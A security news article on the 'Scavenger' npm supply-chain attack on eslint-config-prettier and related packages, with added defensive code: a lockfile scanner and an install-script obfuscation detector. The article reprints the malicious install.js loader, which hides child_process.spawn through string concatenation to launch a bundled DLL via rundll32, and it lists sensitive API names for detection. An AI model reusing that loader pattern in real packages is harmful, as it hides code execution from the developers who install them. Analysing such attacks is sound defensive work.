Scavenger Malware Hijacks Popular npm Packages to Attack Developers
A sophisticated supply chain attack targeting JavaScript developers emerged on Friday, July 18th, 2025, when cybercriminals compromised multiple popular npm packages to distribute the newly identified “Scavenger” malware.
The attack primarily focused on eslint-config-prettier, a widely used code formatting package, along with several other development tools including eslint-plugin-prettier, synckit, @pkgr/core, and napi-postinstall.
The compromise was discovered when GitHub users reported suspicious releases of eslint-config-prettier that appeared in the npm registry despite no corresponding code changes being reflected in the project’s GitHub repository.
The package maintainer later confirmed their npm account had been compromised through a phishing email campaign, allowing attackers to publish malicious versions across multiple package versions including 8.10.1, 9.1.1, 10.1.6, and 10.1.7.
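The practical first step for a team reading this is to check whether any project already pins one of the compromised releases. The following scanner is an added example written for this article, not code from the article, from Humpty's RE blog, or from the affected projects. It walks a package-lock.json (both the flat "packages" map of lockfile v2/v3 and the nested "dependencies" tree of v1), flags the four eslint-config-prettier versions named above, and lists any installed copy of the other four packages for manual review, because the article does not give their affected version numbers. The sample lockfile and its version numbers for the other packages are constructed for the demonstration.

```javascript
// Added example: scan an npm lockfile for the compromised eslint-config-prettier
// releases named in the article, and surface the other named packages for review.

// Versions taken from the article. The other packages are named in the article
// without version numbers, so every installed copy of them is flagged for review.
const KNOWN_BAD = {
  'eslint-config-prettier': new Set(['8.10.1', '9.1.1', '10.1.6', '10.1.7']),
};
const REVIEW_PACKAGES = new Set([
  'eslint-plugin-prettier', 'synckit', '@pkgr/core', 'napi-postinstall',
]);

// Derive the package name from a lockfile "packages" key such as
// "node_modules/@pkgr/core" or "node_modules/a/node_modules/b".
// The root project entry has the key "" and yields null.
function packageNameFromKey(key) {
  const idx = key.lastIndexOf('node_modules/');
  if (idx === -1) return null;
  return key.slice(idx + 'node_modules/'.length);
}

// Lockfile v1 nests "dependencies" recursively instead of a flat "packages" map;
// rebuild the same node_modules-style keys so one code path handles both.
function* walkV1(deps, prefix) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const key = `${prefix}node_modules/${name}`;
    yield [key, entry];
    yield* walkV1(entry.dependencies, key + '/');
  }
}

// Returns { compromised: [...], review: [...] } with {name, version, path} hits.
function scanLockfile(lockJson) {
  const lock = typeof lockJson === 'string' ? JSON.parse(lockJson) : lockJson;
  const entries = lock.packages
    ? Object.entries(lock.packages)
    : [...walkV1(lock.dependencies, '')];
  const result = { compromised: [], review: [] };
  for (const [key, entry] of entries) {
    const name = packageNameFromKey(key);
    if (!name || !entry || !entry.version) continue;
    const hit = { name, version: entry.version, path: key };
    if (KNOWN_BAD[name] && KNOWN_BAD[name].has(entry.version)) {
      result.compromised.push(hit);
    } else if (REVIEW_PACKAGES.has(name)) {
      result.review.push(hit);
    }
  }
  return result;
}

// Constructed sample lockfile (v3 layout); it is not a real project, and the
// versions given for the review-only packages are made up for the demo.
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/eslint-config-prettier': { version: '10.1.7' },
    'node_modules/eslint-plugin-prettier': { version: '5.2.1' },
    'node_modules/some-tool/node_modules/eslint-config-prettier': { version: '9.1.0' },
    'node_modules/@pkgr/core': { version: '0.2.4' },
    'node_modules/lodash': { version: '4.17.21' },
  },
};

console.log(JSON.stringify(scanLockfile(SAMPLE_LOCK), null, 2));
```

In the sample, only the top-level eslint-config-prettier 10.1.7 is reported as compromised; the nested 9.1.0 copy is not in the list and is left alone, which is why the check is on exact version strings rather than package name alone. Run the same function over each lockfile in a monorepo or CI checkout to get a complete picture.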
Humpty’s RE blog identified the malware family as “Scavenger” due to multiple references to the strings “SCVNGR” and “Scavenger” found throughout the malware variants.
The attack represents a significant escalation in supply chain threats, as it specifically targets the developer ecosystem through trusted development tools that are routinely installed in JavaScript projects worldwide.
The malware’s impact extends beyond typical information stealing, as it specifically targets Chromium-based browsers and their associated data stores, including Extensions, ServiceWorkerCache, DawnWebGPUCache, and Visited Links.
This targeting suggests the attackers are particularly interested in harvesting developer credentials, session tokens, and browsing patterns from software development professionals who commonly use these tools.
Infection Mechanism and Code Execution
The Scavenger malware employs a sophisticated infection vector through the compromised eslint-config-prettier package.
Upon installation, the malicious package executes an install.js file containing a deceptively named logDiskSpace() function that serves as the initial payload delivery mechanism.
The function includes deliberately obfuscated JavaScript code that checks for Windows systems before executing the malicious payload:

    // os and path are Node built-ins; the article's excerpt starts inside the
    // function, so these requires are assumed to appear earlier in install.js.
    const os = require('os');
    const path = require('path');

    function logDiskSpace() {
      try {
        // Only Windows hosts are targeted; rundll32 does not exist elsewhere.
        if (os.platform() == 'win32') {
          const tempDir = os.tmpdir();
          // 'chi'+'ld_pro'+'cess' and ["sp"+"awn"] are child_process.spawn,
          // split into fragments so a grep for the API name finds nothing.
          require('chi'+'ld_pro'+'cess')["sp"+"awn"]
            ("rund"+"ll32",
             [path.join(__dirname, './node-gyp' + '.dll') +
              ",main"]);
        }
      } catch (e) {
        // Errors are swallowed so a failed launch does not break npm install.
      }
    }
This code fragment demonstrates the attackers’ use of string concatenation to evade static analysis tools while executing a bundled DLL file named node-gyp.dll using Windows’ rundll32.exe utility.
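The evasion only works against tools that look for the API names as contiguous strings. The check below is an added example written for this article, not code from the article or from any of the affected projects: it folds chains of adjacent string literals joined by + back into one literal, then looks for sensitive names (child_process, spawn, exec, rundll32, node-gyp.dll) that were only visible after folding, and separately notes bracket property access with a literal key such as ["spawn"]. The sample input is the install.js fragment quoted above, embedded here as a constructed string; the sensitive-name list is the author's choice for this demonstration. It is a regex heuristic for triaging lifecycle scripts before running them (for example while installing with --ignore-scripts), not a JavaScript parser.

```javascript
// Added example: detect string-concatenation obfuscation in npm install scripts.

// Names whose presence in an install script warrants manual review (chosen for
// this demo; extend to taste).
const SENSITIVE = ['child_process', 'spawn', 'exec', 'rundll32', 'node-gyp.dll'];

// One single- or double-quoted JS string literal, honouring backslash escapes.
const LIT = /(?:'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")/.source;
// A chain of two or more literals joined by '+', e.g. 'chi'+'ld_pro'+'cess'.
const CHAIN_RE = new RegExp(`${LIT}(?:\\s*\\+\\s*${LIT})+`, 'g');
const LIT_RE = new RegExp(LIT, 'g');

// Replace every literal chain with a single literal holding the joined text.
function foldConcatenations(src) {
  return src.replace(CHAIN_RE, (chain) => {
    const parts = chain.match(LIT_RE).map((lit) => lit.slice(1, -1));
    return `'${parts.join('')}'`;
  });
}

// Report sensitive names present after folding, flagging those that were not
// visible in the raw source, plus bracket accesses with a literal property key.
function reviewInstallScript(src) {
  const folded = foldConcatenations(src);
  const findings = [];
  for (const name of SENSITIVE) {
    if (folded.includes(name)) {
      findings.push({ name, hiddenByConcat: !src.includes(name) });
    }
  }
  const bracketProps = [...folded.matchAll(/\[\s*'([A-Za-z_$][\w$]*)'\s*\]/g)]
    .map((m) => m[1]);
  const suspicious = findings.some((f) => f.hiddenByConcat) || bracketProps.length > 0;
  return { findings, bracketProps, verdict: suspicious ? 'review' : 'ok' };
}

// Constructed sample: the obfuscated fragment quoted in the article, as text.
const SAMPLE_INSTALL_JS = `
function logDiskSpace() {
  try {
    if (os.platform() == 'win32') {
      const tempDir = os.tmpdir();
      require('chi'+'ld_pro'+'cess')["sp"+"awn"]
        ("rund"+"ll32",
         [path.join(__dirname, './node-gyp' + '.dll') + ",main"]);
    }
  } catch (e) {}
}
`;

console.log(JSON.stringify(reviewInstallScript(SAMPLE_INSTALL_JS), null, 2));
```

On the sample, all four hits (child_process, spawn, rundll32, node-gyp.dll) are reported with hiddenByConcat set, and the bracket access resolves to spawn, so the verdict is "review". A script that names child_process openly would still be listed but without the hidden flag, which is the signal worth escalating on.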
The malware loader, compiled on the same day as the attack (2025-07-18 08:59:38 UTC), incorporates multiple anti-analysis techniques including VM detection through SMBIOS firmware table enumeration and process space scanning for security tools like Avast, Sandboxie, and Comodo Antivirus.
The malware utilizes XXTEA block cipher encryption with a distinctive DELTA value of 0x9e3779b9 for command and control communications, establishing initial contact through base64-encoded responses from compromised infrastructure.